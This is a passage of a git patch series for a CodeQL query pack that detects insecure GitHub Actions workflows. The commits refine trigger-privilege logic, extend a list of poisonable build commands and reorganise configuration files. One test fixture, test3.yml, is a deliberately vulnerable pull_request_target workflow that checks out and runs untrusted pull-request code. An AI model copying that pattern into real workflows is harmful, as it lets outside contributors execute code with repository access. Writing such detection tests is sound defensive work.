echo "##[group] QLPack" - if [ -f $EXTPACK_PATH/codeql-pack.yml ]; then cat $EXTPACK_PATH/codeql-pack.yml; fi - echo "##[endgroup]" - - - name: Scan workflows - shell: bash - env: - GITHUB_TOKEN: ${{ inputs.token }} - GH_TOKEN: ${{ inputs.token }} - INPUT_SOURCE-ROOT: ${{ inputs.source-root }} - INPUT_SARIF-OUTPUT: ${{ inputs.sarif-output }} - INPUT_SUITE: ${{ inputs.suite }} - INPUT_PACKS: ${{ inputs.packs }} - run: | - node ${{ github.action_path }}/.github/action/dist/index.js diff --git a/clean.sh b/clean.sh deleted file mode 100755 index e0458a639e3..00000000000 --- a/clean.sh +++ /dev/null @@ -1,2 +0,0 @@ -#! /bin/bash -find . -type d -name "*testproj*" -exec rm -r {} + From 6df70d1a455f67ce3a174ea0dda7ea9384fec8ad Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sun, 23 Jun 2024 21:34:30 +0200 Subject: [PATCH 0343/1267] Do not consider priv events if runtime data is available --- ql/lib/codeql/actions/ast/internal/Ast.qll | 21 +++++++--- .../CWE-829/.github/workflows/test3.yml | 41 +++++++++++++++++++ .../UntrustedCheckoutCritical.expected | 1 + 3 files changed, 58 insertions(+), 5 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index d4864a80e54..da54833e9a6 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -853,6 +853,14 @@ class JobImpl extends AstNodeImpl, TJobNode { this.getEnclosingWorkflow().getPermissions().getAPermission().matches("%write") } + private predicate hasRuntimeData() { + exists(string path, string trigger, string name, string secrets_source, string perms | + workflowDataModel(path, trigger, name, secrets_source, perms, _) and + path.trim() = this.getLocation().getFile().getRelativePath() and + name.trim().matches(this.getId() + "%") + ) + } + private predicate hasRuntimeWritePermissions() { // the effective runtime permissions have write access exists(string path, string trigger, string name, string secrets_source, string perms | @@ -885,15 +893,18 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Holds if the action is privileged and externally triggerable. */ predicate isPrivilegedExternallyTriggerable() { exists(EventImpl e | - // job is triggereable by an external user this.getATriggerEvent() = e and + // job is triggereable by an external user e.isExternallyTriggerable() and - // job is privileged (write access or access to secrets) + // no matter if `pull_request` is granted write permissions or access to secrets + // when the job is triggered by a `pull_request` event from a fork, they will get revoked + not e.getName() = "pull_request" and ( - this.isPrivileged() and - not e.getName() = "pull_request" + // job is privileged (write access or access to secrets) + this.isPrivileged() or - not this.isPrivileged() and + // the trigger event is __normally__ privileged and we have no runtime data to prove otherwise + not this.hasRuntimeData() and e.isPrivileged() ) ) diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml new file mode 100644 index 00000000000..d9aa2973e00 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml @@ -0,0 +1,41 @@ +name: "Test" +permissions: + actions: none + checks: none + contents: read + deployments: none + id-token: none + issues: none + discussions: none + packages: none + pages: none + pull-requests: read + repository-projects: none + security-events: none + statuses: none +on: + pull_request_target: + types: + - opened + - edited + - synchronize + +jobs: + main: + name: Test Pull Request + runs-on: ubuntu-latest + steps: + - name: Checkout + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - run: npm install + working-directory: scripts/github-actions/semantic-pull-request/ + - name: Lint PR Title + if: github.event_name == 'pull_request_target' + uses: actions/github-script@v7 + with: + script: | + const verifyPullRequest = require('./scripts/github-actions/semantic-pull-request') + await verifyPullRequest({ context, core, github }) diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 92d5a0b5ce1..0ff47fd2c53 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -4,5 +4,6 @@ | .github/workflows/level0.yml:99:9:103:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/level0.yml:125:9:129:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/mend.yml:22:9:29:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/test3.yml:28:9:33:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From b5dfda27fdc7a39e14ff996f034015e4631159a2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 24 Jun 2024 12:45:24 +0200 Subject: [PATCH 0344/1267] Add cargo as poisonable step --- ql/lib/codeql/actions/security/PoisonableSteps.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index f80f09a32d8..b1d5269d44a 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -23,7 +23,7 @@ private string dangerousCommands() { "terraform apply", "gomplate ", "pre-commit run", "pre-commit install", "go generate", "msbuild ", "mvn ", "gradle ", "bundle install", "bundle exec ", "^ant ", "mkdocs build", "pytest", "pip install -r ", "pip install --requirement", "java -jar ", "poetry install", - "poetry run" + "poetry run", "cargo " ] } From 24d69f2ee80f0daab0a9ecbd13867046e61f0b6c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 24 Jun 2024 12:45:35 +0200 Subject: [PATCH 0345/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 70edc1b0574..abc56e6a090 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.2 +version: 0.1.3 dependencies: codeql/util: ^1.0.0 codeql/yaml: ^1.0.0 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 89df5ee8797..74678b945ca 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.2 +version: 0.1.3 groups: [actions, queries] suites: codeql-suites extractor: javascript From fc8173239e1ba10b9ed2e4f3b5dee76e3854b0cf Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 25 Jun 2024 09:47:43 +0200 Subject: [PATCH 0346/1267] Move configuration to MaD files --- ql/lib/codeql/actions/ast/internal/Ast.qll | 2 +- ql/lib/codeql/actions/config/Config.qll | 74 +++++++++++++++++++ .../actions/config/ConfigExtensions.qll | 41 ++++++++++ .../codeql/actions/dataflow/ExternalFlow.qll | 45 ----------- .../codeql/actions/dataflow/FlowSources.qll | 3 +- .../internal/ExternalFlowExtensions.qll | 22 ------ .../security/ArtifactPoisoningQuery.qll | 4 +- .../actions/security/CachePoisoningQuery.qll | 2 +- .../actions/security/PoisonableSteps.qll | 62 ++++------------ .../actions/security/SelfHostedQuery.qll | 2 +- .../context_event_map.yml} | 25 +------ .../config/externally_triggereable_events.yml | 18 +++++ ql/lib/ext/config/poisonable_steps.yml | 55 ++++++++++++++ ql/lib/ext/config/workflow_runtime_data.yml | 9 +++ .../8398a7_action-slack.model.yml | 0 ...rSource_sonarcloud-github-action.model.yml | 0 .../actions_github-script.model.yml | 0 ...ahmadnassri_action-changed-files.model.yml | 0 .../akhileshns_heroku-deploy.model.yml | 0 ...nnn_action-semantic-pull-request.model.yml | 0 .../anchore_sbom-action.model.yml | 0 .../anchore_scan-action.model.yml | 0 .../andresz1_size-limit-action.model.yml | 0 .../android-actions_setup-android.model.yml | 0 ...le-actions_import-codesign-certs.model.yml | 0 .../{ => manual}/asdf-vm_actions.model.yml | 0 ...taylor_read-json-property-action.model.yml | 0 ...ley-taylor_regex-property-action.model.yml | 0 .../aszc_change-string-case-action.model.yml | 0 ...ctions_configure-aws-credentials.model.yml | 0 .../axel-op_googlejavaformat-action.model.yml | 0 .../{ => manual}/azure_powershell.model.yml | 0 .../bahmutov_npm-install.model.yml | 0 .../blackducksoftware_github-action.model.yml | 0 .../bobheadxi_deployments.model.yml | 0 .../bufbuild_buf-breaking-action.model.yml | 0 .../bufbuild_buf-lint-action.model.yml | 0 .../bufbuild_buf-setup-action.model.yml | 0 .../cachix_cachix-action.model.yml | 0 .../{ => manual}/changesets_action.model.yml | 0 .../cloudflare_wrangler-action.model.yml | 0 .../coursier_cache-action.model.yml | 0 .../crazy-max_ghaction-chocolatey.model.yml | 0 .../crazy-max_ghaction-import-gpg.model.yml | 0 .../csexton_release-asset-action.model.yml | 0 ...cycjimmy_semantic-release-action.model.yml | 0 .../cypress-io_github-action.model.yml | 0 .../dailydotdev_action-devcard.model.yml | 0 ...me_reportgenerator-github-action.model.yml | 0 .../daspn_private-actions-checkout.model.yml | 0 .../dawidd6_action-ansible-playbook.model.yml | 0 ...dawidd6_action-download-artifact.model.yml | 0 .../delaguardo_setup-clojure.model.yml | 0 ...tesystems_magic-nix-cache-action.model.yml | 0 ...er-practice_actions-setup-docker.model.yml | 0 .../docker_build-push-action.model.yml | 0 .../{ => manual}/endbug_latest-tag.model.yml | 0 .../expo_expo-github-action.model.yml | 0 ...seextended_action-hosting-deploy.model.yml | 0 .../frabert_replace-string-action.model.yml | 0 ...nzdiebold_github-env-vars-action.model.yml | 0 .../gabrielbb_xvfb-action.model.yml | 0 .../game-ci_unity-builder.model.yml | 0 .../game-ci_unity-test-runner.model.yml | 0 ...autamkrishnar_blog-post-workflow.model.yml | 0 .../getsentry_action-release.model.yml | 0 .../github_codeql-action.model.yml | 0 .../go-semantic-release_action.model.yml | 0 .../golangci_golangci-lint-action.model.yml | 0 .../gonuit_heroku-docker-deploy.model.yml | 0 .../goreleaser_goreleaser-action.model.yml | 0 ...te-or-update-pull-request-action.model.yml | 0 .../gradle_gradle-build-action.model.yml | 0 .../haya14busa_action-cond.model.yml | 0 .../hexlet_project-action.model.yml | 0 .../ilammy_msvc-dev-cmd.model.yml | 0 .../{ => manual}/ilammy_setup-nasm.model.yml | 0 .../{ => manual}/imjohnbo_issue-bot.model.yml | 0 .../iterative_setup-cml.model.yml | 0 .../iterative_setup-dvc.model.yml | 0 ...sives_github-pages-deploy-action.model.yml | 0 .../jitterbit_get-changed-files.model.yml | 0 .../johnnymorganz_stylua-action.model.yml | 0 .../jsdaniell_create-json.model.yml | 0 .../jurplel_install-qt-action.model.yml | 0 .../jwalton_gh-ecr-push.model.yml | 0 ...han_pull-request-comment-trigger.model.yml | 0 ...leci-artifacts-redirector-action.model.yml | 0 .../leafo_gh-actions-lua.model.yml | 0 .../leafo_gh-actions-luarocks.model.yml | 0 .../lucasbento_auto-close-issues.model.yml | 0 ..._actions-find-and-replace-string.model.yml | 0 .../magefile_mage-action.model.yml | 0 .../maierj_fastlane-action.model.yml | 0 .../manusa_actions-setup-minikube.model.yml | 0 .../marocchino_on_artifact.model.yml | 0 .../mattdavis0351_actions.model.yml | 0 .../meteorengineer_setup-meteor.model.yml | 0 ...tro-digital_setup-tools-for-waas.model.yml | 0 .../microsoft_setup-msbuild.model.yml | 0 ...mishakav_pytest-coverage-comment.model.yml | 0 ...hers-excellent_docker-build-push.model.yml | 0 .../{ => manual}/msys2_setup-msys2.model.yml | 0 .../mxschmitt_action-tmate.model.yml | 0 .../mymindstorm_setup-emsdk.model.yml | 0 .../nanasess_setup-chromedriver.model.yml | 0 .../{ => manual}/nanasess_setup-php.model.yml | 0 .../{ => manual}/nick-fields_retry.model.yml | 0 .../octokit_graphql-action.model.yml | 0 .../octokit_request-action.model.yml | 0 .../olafurpg_setup-scala.model.yml | 0 .../paambaati_codeclimate-action.model.yml | 0 .../peter-evans_create-pull-request.model.yml | 0 ...-murray_issue-body-parser-action.model.yml | 0 .../plasmicapp_plasmic-action.model.yml | 0 .../preactjs_compressed-size-action.model.yml | 0 .../{ => manual}/py-actions_flake8.model.yml | 0 ...py-actions_py-dependency-install.model.yml | 0 .../pyo3_maturin-action.model.yml | 0 ...vecircus_android-emulator-runner.model.yml | 0 ...bers-in-action_download-artifact.model.yml | 0 .../reggionick_s3-deploy.model.yml | 0 .../renovatebot_github-action.model.yml | 0 .../roots_issue-closer-action.model.yml | 0 .../ros-tooling_setup-ros.model.yml | 0 .../{ => manual}/ruby_setup-ruby.model.yml | 0 ...ction-detect-and-tag-new-version.model.yml | 0 .../sergeysova_jq-action.model.yml | 0 ...shallwefootball_upload-s3-action.model.yml | 0 .../shogo82148_actions-setup-perl.model.yml | 0 ...skitionek_notify-microsoft-teams.model.yml | 0 .../snow-actions_eclint.model.yml | 0 .../stackhawk_hawkscan-action.model.yml | 0 .../step-security_harden-runner.model.yml | 0 .../suisei-cn_actions-download-file.model.yml | 0 .../{ => manual}/tibdex_backport.model.yml | 0 .../timheuer_base64-to-file.model.yml | 0 .../tj-actions_branch-names.model.yml | 0 .../trilom_file-changes-action.model.yml | 0 ...ss_conventional-changelog-action.model.yml | 0 .../tryghost_action-deploy-theme.model.yml | 0 .../tzkhan_pr-update-action.model.yml | 0 .../veracode_veracode-sca.model.yml | 0 .../wearerequired_lint-action.model.yml | 0 .../webfactory_ssh-agent.model.yml | 0 .../xt0rted_slash-command-action.model.yml | 0 .../zaproxy_action-baseline.model.yml | 0 .../zaproxy_action-full-scan.model.yml | 0 ql/lib/qlpack.yml | 6 +- ql/test/library-tests/workflowenum.ql | 2 +- 150 files changed, 224 insertions(+), 148 deletions(-) create mode 100644 ql/lib/codeql/actions/config/Config.qll create mode 100644 ql/lib/codeql/actions/config/ConfigExtensions.qll rename ql/lib/ext/{workflow-models/workflow-models.yml => config/context_event_map.yml} (78%) create mode 100644 ql/lib/ext/config/externally_triggereable_events.yml create mode 100644 ql/lib/ext/config/poisonable_steps.yml create mode 100644 ql/lib/ext/config/workflow_runtime_data.yml rename ql/lib/ext/{ => manual}/8398a7_action-slack.model.yml (100%) rename ql/lib/ext/{ => manual}/SonarSource_sonarcloud-github-action.model.yml (100%) rename ql/lib/ext/{ => manual}/actions_github-script.model.yml (100%) rename ql/lib/ext/{ => manual}/ahmadnassri_action-changed-files.model.yml (100%) rename ql/lib/ext/{ => manual}/akhileshns_heroku-deploy.model.yml (100%) rename ql/lib/ext/{ => manual}/amannn_action-semantic-pull-request.model.yml (100%) rename ql/lib/ext/{ => manual}/anchore_sbom-action.model.yml (100%) rename ql/lib/ext/{ => manual}/anchore_scan-action.model.yml (100%) rename ql/lib/ext/{ => manual}/andresz1_size-limit-action.model.yml (100%) rename ql/lib/ext/{ => manual}/android-actions_setup-android.model.yml (100%) rename ql/lib/ext/{ => manual}/apple-actions_import-codesign-certs.model.yml (100%) rename ql/lib/ext/{ => manual}/asdf-vm_actions.model.yml (100%) rename ql/lib/ext/{ => manual}/ashley-taylor_read-json-property-action.model.yml (100%) rename ql/lib/ext/{ => manual}/ashley-taylor_regex-property-action.model.yml (100%) rename ql/lib/ext/{ => manual}/aszc_change-string-case-action.model.yml (100%) rename ql/lib/ext/{ => manual}/aws-actions_configure-aws-credentials.model.yml (100%) rename ql/lib/ext/{ => manual}/axel-op_googlejavaformat-action.model.yml (100%) rename ql/lib/ext/{ => manual}/azure_powershell.model.yml (100%) rename ql/lib/ext/{ => manual}/bahmutov_npm-install.model.yml (100%) rename ql/lib/ext/{ => manual}/blackducksoftware_github-action.model.yml (100%) rename ql/lib/ext/{ => manual}/bobheadxi_deployments.model.yml (100%) rename ql/lib/ext/{ => manual}/bufbuild_buf-breaking-action.model.yml (100%) rename ql/lib/ext/{ => manual}/bufbuild_buf-lint-action.model.yml (100%) rename ql/lib/ext/{ => manual}/bufbuild_buf-setup-action.model.yml (100%) rename ql/lib/ext/{ => manual}/cachix_cachix-action.model.yml (100%) rename ql/lib/ext/{ => manual}/changesets_action.model.yml (100%) rename ql/lib/ext/{ => manual}/cloudflare_wrangler-action.model.yml (100%) rename ql/lib/ext/{ => manual}/coursier_cache-action.model.yml (100%) rename ql/lib/ext/{ => manual}/crazy-max_ghaction-chocolatey.model.yml (100%) rename ql/lib/ext/{ => manual}/crazy-max_ghaction-import-gpg.model.yml (100%) rename ql/lib/ext/{ => manual}/csexton_release-asset-action.model.yml (100%) rename ql/lib/ext/{ => manual}/cycjimmy_semantic-release-action.model.yml (100%) rename ql/lib/ext/{ => manual}/cypress-io_github-action.model.yml (100%) rename ql/lib/ext/{ => manual}/dailydotdev_action-devcard.model.yml (100%) rename ql/lib/ext/{ => manual}/danielpalme_reportgenerator-github-action.model.yml (100%) rename ql/lib/ext/{ => manual}/daspn_private-actions-checkout.model.yml (100%) rename ql/lib/ext/{ => manual}/dawidd6_action-ansible-playbook.model.yml (100%) rename ql/lib/ext/{ => manual}/dawidd6_action-download-artifact.model.yml (100%) rename ql/lib/ext/{ => manual}/delaguardo_setup-clojure.model.yml (100%) rename ql/lib/ext/{ => manual}/determinatesystems_magic-nix-cache-action.model.yml (100%) rename ql/lib/ext/{ => manual}/docker-practice_actions-setup-docker.model.yml (100%) rename ql/lib/ext/{ => manual}/docker_build-push-action.model.yml (100%) rename ql/lib/ext/{ => manual}/endbug_latest-tag.model.yml (100%) rename ql/lib/ext/{ => manual}/expo_expo-github-action.model.yml (100%) rename ql/lib/ext/{ => manual}/firebaseextended_action-hosting-deploy.model.yml (100%) rename ql/lib/ext/{ => manual}/frabert_replace-string-action.model.yml (100%) rename ql/lib/ext/{ => manual}/franzdiebold_github-env-vars-action.model.yml (100%) rename ql/lib/ext/{ => manual}/gabrielbb_xvfb-action.model.yml (100%) rename ql/lib/ext/{ => manual}/game-ci_unity-builder.model.yml (100%) rename ql/lib/ext/{ => manual}/game-ci_unity-test-runner.model.yml (100%) rename ql/lib/ext/{ => manual}/gautamkrishnar_blog-post-workflow.model.yml (100%) rename ql/lib/ext/{ => manual}/getsentry_action-release.model.yml (100%) rename ql/lib/ext/{ => manual}/github_codeql-action.model.yml (100%) rename ql/lib/ext/{ => manual}/go-semantic-release_action.model.yml (100%) rename ql/lib/ext/{ => manual}/golangci_golangci-lint-action.model.yml (100%) rename ql/lib/ext/{ => manual}/gonuit_heroku-docker-deploy.model.yml (100%) rename ql/lib/ext/{ => manual}/goreleaser_goreleaser-action.model.yml (100%) rename ql/lib/ext/{ => manual}/gr2m_create-or-update-pull-request-action.model.yml (100%) rename ql/lib/ext/{ => manual}/gradle_gradle-build-action.model.yml (100%) rename ql/lib/ext/{ => manual}/haya14busa_action-cond.model.yml (100%) rename ql/lib/ext/{ => manual}/hexlet_project-action.model.yml (100%) rename ql/lib/ext/{ => manual}/ilammy_msvc-dev-cmd.model.yml (100%) rename ql/lib/ext/{ => manual}/ilammy_setup-nasm.model.yml (100%) rename ql/lib/ext/{ => manual}/imjohnbo_issue-bot.model.yml (100%) rename ql/lib/ext/{ => manual}/iterative_setup-cml.model.yml (100%) rename ql/lib/ext/{ => manual}/iterative_setup-dvc.model.yml (100%) rename ql/lib/ext/{ => manual}/jamesives_github-pages-deploy-action.model.yml (100%) rename ql/lib/ext/{ => manual}/jitterbit_get-changed-files.model.yml (100%) rename ql/lib/ext/{ => manual}/johnnymorganz_stylua-action.model.yml (100%) rename ql/lib/ext/{ => manual}/jsdaniell_create-json.model.yml (100%) rename ql/lib/ext/{ => manual}/jurplel_install-qt-action.model.yml (100%) rename ql/lib/ext/{ => manual}/jwalton_gh-ecr-push.model.yml (100%) rename ql/lib/ext/{ => manual}/khan_pull-request-comment-trigger.model.yml (100%) rename ql/lib/ext/{ => manual}/larsoner_circleci-artifacts-redirector-action.model.yml (100%) rename ql/lib/ext/{ => manual}/leafo_gh-actions-lua.model.yml (100%) rename ql/lib/ext/{ => manual}/leafo_gh-actions-luarocks.model.yml (100%) rename ql/lib/ext/{ => manual}/lucasbento_auto-close-issues.model.yml (100%) rename ql/lib/ext/{ => manual}/mad9000_actions-find-and-replace-string.model.yml (100%) rename ql/lib/ext/{ => manual}/magefile_mage-action.model.yml (100%) rename ql/lib/ext/{ => manual}/maierj_fastlane-action.model.yml (100%) rename ql/lib/ext/{ => manual}/manusa_actions-setup-minikube.model.yml (100%) rename ql/lib/ext/{ => manual}/marocchino_on_artifact.model.yml (100%) rename ql/lib/ext/{ => manual}/mattdavis0351_actions.model.yml (100%) rename ql/lib/ext/{ => manual}/meteorengineer_setup-meteor.model.yml (100%) rename ql/lib/ext/{ => manual}/metro-digital_setup-tools-for-waas.model.yml (100%) rename ql/lib/ext/{ => manual}/microsoft_setup-msbuild.model.yml (100%) rename ql/lib/ext/{ => manual}/mishakav_pytest-coverage-comment.model.yml (100%) rename ql/lib/ext/{ => manual}/mr-smithers-excellent_docker-build-push.model.yml (100%) rename ql/lib/ext/{ => manual}/msys2_setup-msys2.model.yml (100%) rename ql/lib/ext/{ => manual}/mxschmitt_action-tmate.model.yml (100%) rename ql/lib/ext/{ => manual}/mymindstorm_setup-emsdk.model.yml (100%) rename ql/lib/ext/{ => manual}/nanasess_setup-chromedriver.model.yml (100%) rename ql/lib/ext/{ => manual}/nanasess_setup-php.model.yml (100%) rename ql/lib/ext/{ => manual}/nick-fields_retry.model.yml (100%) rename ql/lib/ext/{ => manual}/octokit_graphql-action.model.yml (100%) rename ql/lib/ext/{ => manual}/octokit_request-action.model.yml (100%) rename ql/lib/ext/{ => manual}/olafurpg_setup-scala.model.yml (100%) rename ql/lib/ext/{ => manual}/paambaati_codeclimate-action.model.yml (100%) rename ql/lib/ext/{ => manual}/peter-evans_create-pull-request.model.yml (100%) rename ql/lib/ext/{ => manual}/peter-murray_issue-body-parser-action.model.yml (100%) rename ql/lib/ext/{ => manual}/plasmicapp_plasmic-action.model.yml (100%) rename ql/lib/ext/{ => manual}/preactjs_compressed-size-action.model.yml (100%) rename ql/lib/ext/{ => manual}/py-actions_flake8.model.yml (100%) rename ql/lib/ext/{ => manual}/py-actions_py-dependency-install.model.yml (100%) rename ql/lib/ext/{ => manual}/pyo3_maturin-action.model.yml (100%) rename ql/lib/ext/{ => manual}/reactivecircus_android-emulator-runner.model.yml (100%) rename ql/lib/ext/{ => manual}/redhat-plumbers-in-action_download-artifact.model.yml (100%) rename ql/lib/ext/{ => manual}/reggionick_s3-deploy.model.yml (100%) rename ql/lib/ext/{ => manual}/renovatebot_github-action.model.yml (100%) rename ql/lib/ext/{ => manual}/roots_issue-closer-action.model.yml (100%) rename ql/lib/ext/{ => manual}/ros-tooling_setup-ros.model.yml (100%) rename ql/lib/ext/{ => manual}/ruby_setup-ruby.model.yml (100%) rename ql/lib/ext/{ => manual}/salsify_action-detect-and-tag-new-version.model.yml (100%) rename ql/lib/ext/{ => manual}/sergeysova_jq-action.model.yml (100%) rename ql/lib/ext/{ => manual}/shallwefootball_upload-s3-action.model.yml (100%) rename ql/lib/ext/{ => manual}/shogo82148_actions-setup-perl.model.yml (100%) rename ql/lib/ext/{ => manual}/skitionek_notify-microsoft-teams.model.yml (100%) rename ql/lib/ext/{ => manual}/snow-actions_eclint.model.yml (100%) rename ql/lib/ext/{ => manual}/stackhawk_hawkscan-action.model.yml (100%) rename ql/lib/ext/{ => manual}/step-security_harden-runner.model.yml (100%) rename ql/lib/ext/{ => manual}/suisei-cn_actions-download-file.model.yml (100%) rename ql/lib/ext/{ => manual}/tibdex_backport.model.yml (100%) rename ql/lib/ext/{ => manual}/timheuer_base64-to-file.model.yml (100%) rename ql/lib/ext/{ => manual}/tj-actions_branch-names.model.yml (100%) rename ql/lib/ext/{ => manual}/trilom_file-changes-action.model.yml (100%) rename ql/lib/ext/{ => manual}/tripss_conventional-changelog-action.model.yml (100%) rename ql/lib/ext/{ => manual}/tryghost_action-deploy-theme.model.yml (100%) rename ql/lib/ext/{ => manual}/tzkhan_pr-update-action.model.yml (100%) rename ql/lib/ext/{ => manual}/veracode_veracode-sca.model.yml (100%) rename ql/lib/ext/{ => manual}/wearerequired_lint-action.model.yml (100%) rename ql/lib/ext/{ => manual}/webfactory_ssh-agent.model.yml (100%) rename ql/lib/ext/{ => manual}/xt0rted_slash-command-action.model.yml (100%) rename ql/lib/ext/{ => manual}/zaproxy_action-baseline.model.yml (100%) rename ql/lib/ext/{ => manual}/zaproxy_action-full-scan.model.yml (100%) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index da54833e9a6..8d965c3e4c7 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1,7 +1,7 @@ private import codeql.actions.ast.internal.Yaml private import codeql.Locations private import codeql.actions.Helper -private import codeql.actions.dataflow.ExternalFlow +private import codeql.actions.config.Config /** * Gets the length of each line in the StringValue . diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll new file mode 100644 index 00000000000..d6a85c426c6 --- /dev/null +++ b/ql/lib/codeql/actions/config/Config.qll @@ -0,0 +1,74 @@ +import ConfigExtensions as Extensions + +/** + * MaD models for workflow details + * Fields: + * - path: Path to the workflow file + * - trigger: Trigger for the workflow + * - job: Job name + * - secrets_source: Source of secrets + * - permissions: Permissions for the workflow + * - runner: Runner info for the workflow + */ +predicate workflowDataModel( + string path, string trigger, string job, string secrets_source, string permissions, string runner +) { + Extensions::workflowDataModel(path, trigger, job, secrets_source, permissions, runner) +} + +/** + * MaD models for repository details + * Fields: + * - visibility: Visibility of the repository + * - default_branch_name: Default branch name + */ +predicate repositoryDataModel(string visibility, string default_branch_name) { + Extensions::repositoryDataModel(visibility, default_branch_name) +} + +/** + * MaD models for context/trigger mapping + * Fields: + * - trigger: Trigger for the workflow + * - context_prefix: Prefix for the context + */ +predicate contextTriggerDataModel(string trigger, string context_prefix) { + Extensions::contextTriggerDataModel(trigger, context_prefix) +} + +/** + * MaD models for externally triggerable events + * Fields: + * - event: Event name + */ +predicate externallyTriggerableEventsDataModel(string event) { + Extensions::externallyTriggerableEventsDataModel(event) +} + +/** + * MaD models for poisonable commands + * Fields: + * - regexp: Regular expression for matching poisonable commands + */ +predicate poisonableCommandsDataModel(string regexp) { + Extensions::poisonableCommandsDataModel(regexp) +} + +/** + * MaD models for poisonable local scripts + * Fields: + * - regexp: Regular expression for matching poisonable local scripts + * - group: Script capture group number for the regular expression + */ +predicate poisonableLocalScriptsDataModel(string regexp, int group) { + Extensions::poisonableLocalScriptsDataModel(regexp, group) +} + +/** + * MaD models for poisonable actions + * Fields: + * - action: action name + */ +predicate poisonableActionsDataModel(string action) { + Extensions::poisonableActionsDataModel(action) +} diff --git a/ql/lib/codeql/actions/config/ConfigExtensions.qll b/ql/lib/codeql/actions/config/ConfigExtensions.qll new file mode 100644 index 00000000000..3ca4b6a7559 --- /dev/null +++ b/ql/lib/codeql/actions/config/ConfigExtensions.qll @@ -0,0 +1,41 @@ +/** + * This module provides extensible predicates for defining MaD models. + */ + +/** + * Holds if workflow data model exists for the given parameters. + */ +extensible predicate workflowDataModel( + string path, string trigger, string job, string secrets_source, string permissions, string runner +); + +/** + * Holds if repository data model exists for the given parameters. + */ +extensible predicate repositoryDataModel(string visibility, string default_branch_name); + +/** + * Holds if a context expression starting with context_prefix is available for a given trigger. + */ +extensible predicate contextTriggerDataModel(string trigger, string context_prefix); + +/** + * Holds if a given trigger event can be fired by an external actor. + */ +extensible predicate externallyTriggerableEventsDataModel(string event); + +/** + * Holds for strings that match poisonable commands. + */ +extensible predicate poisonableCommandsDataModel(string regexp); + +/** + * Holds for strings that match poisonable local scripts. + */ +extensible predicate poisonableLocalScriptsDataModel(string regexp, int group); + +/** + * Holds for actions that can be poisoned through local files. + */ +extensible predicate poisonableActionsDataModel(string action); + diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index d0b84f918d5..2cb8c56b147 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -2,51 +2,6 @@ private import internal.ExternalFlowExtensions as Extensions private import codeql.actions.DataFlow private import actions -/** - * MaD models for workflow details - * Fields: - * - path: Path to the workflow file - * - trigger: Trigger for the workflow - * - job: Job name - * - secrets_source: Source of secrets - * - permissions: Permissions for the workflow - * - runner: Runner info for the workflow - */ -predicate workflowDataModel( - string path, string trigger, string job, string secrets_source, string permissions, string runner -) { - Extensions::workflowDataModel(path, trigger, job, secrets_source, permissions, runner) -} - -/** - * MaD models for repository details - * Fields: - * - visibility: Visibility of the repository - * - default_branch_name: Default branch name - */ -predicate repositoryDataModel(string visibility, string default_branch_name) { - Extensions::repositoryDataModel(visibility, default_branch_name) -} - -/** - * MaD models for context/trigger mapping - * Fields: - * - trigger: Trigger for the workflow - * - context_prefix: Prefix for the context - */ -predicate contextTriggerDataModel(string trigger, string context_prefix) { - Extensions::contextTriggerDataModel(trigger, context_prefix) -} - -/** - * MaD models for externally triggerable events - * Fields: 